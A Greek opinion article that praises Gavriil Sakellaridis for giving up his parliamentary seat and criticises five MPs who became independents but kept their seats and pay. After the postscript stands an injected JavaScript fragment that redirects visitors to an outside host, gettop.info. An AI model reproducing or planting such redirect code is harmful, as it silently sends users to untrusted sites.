Γαβριήλ Σακελλαρίδης, νέο ήθος στην πολιτική και ανεξάρτητοι με το χρήμα στην τσέπη…

0
98
Ο βουλευτής Γιώργος Καρράς, που ανεξαρτητοποιήθηκε από την Ένωση Κεντρώων, είναι ο πέμπτος στη σειρά μετά τις τελευταίες εκλογές,  που φεύγει από τη κόμμα του οικειοθελώς ή διαγράφεται, κρατώντας και την έδρα και τη βουλευτική αποζημίωση.

Προηγήθηκαν τρεις βουλευτές του Ποταμιού. Ο Χάρης Θεοχάρης αποφάσισε μόνος του να κλείσει πίσω την πόρτα στο κόμμα με το οποίο εξελέγη στο Κοινοβούλιο δυο φορές το 2015, όπως και η Κατερίνα Μάρκου. Τον Ιάσωνα Φωτήλα πρόλαβε ο Σταύρος Θεοδωράκης και τον διέγραψε, πριν ανοίξει πανιά για τη ΝΔ του Κυριάκου Μητσοτάκη.

Στο ΠΑΣΟΚ η Φώφη Γεννηματά διέγραψε τον Λεωνίδα Γρηγοράκο, στενό πολιτικό φίλο τού προκατόχου της στην ηγεσία, Ευάγγελου Βενιζέλου.

Και οι πέντε κρίνουν σκόπιμο να παραμείνουν ενεργοί στη Βουλή και να συνεχίσουν τις δημόσιες ππαρεμβάσεις τους, λες και δεν έχει συμβεί τίποτα. Ούτε που περνά από το μυαλό τους να παραδώσουν τις έδρες σταα κόμματα με τα οποία εξελέγησαν και να πάνε σπίτι τους.

Ο μόνος που κινήθηκε διαφορετικά ήταν ο Γαβριήλ Σακελαρίδης. Πριν από ένα χρόνο διαφώνησε με τα νέα μέτρα της κυβέρνησης του Αλέξη Τσίπρα, πήρε το καπέλο του και πήγε σπίτι του. Παρέδωσε την έδρα στον Σύριζα και μαζί και το μηνιαίο εισόδημα που προέκυπτε από αυτήν. Μήπως είναι πλούσιος και δεν έχει ανάγκη τα χρήματα; Κάθε άλλο. Απλώς, έτσι δείχνει να αντιλαμβάνεται τη συμμετοχή στην πολιτική.

Νομίζω πως η εικόνα, τού ενός έναντι των πέντε, είναι συντριπτική. Ο πρώην υποψήφιος δήμαρχος της Αθήνας και εκπρόσωπος της κυβέρνησης Σύριζα -ΑΝΕΛ έως τον Σεπτέμβριο του 2015 αποτελεί τον φορέα νέου ήθους στην πολιτική, που τόσο ανάγκη έχει η χώρα, ενώ οι άλλοι πέντε τους εκπροσώπους του παλιού και φθαρμένου πολιτικού συστήματος. Βλέπετε, το «νέο» δεν έχει σχέση ούτε με το νεαρό της ηλικίας, ούτε με το χρόνο εμπλοκής στα δημόσια πράγματα…

ΥΓ Βεβαίως, στις περιπτώσεις οικοιοθελών ανεξαρτητοποιήσεων τα πράγματα είναι χειρότερα από εκείνες των διαγραφών… setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here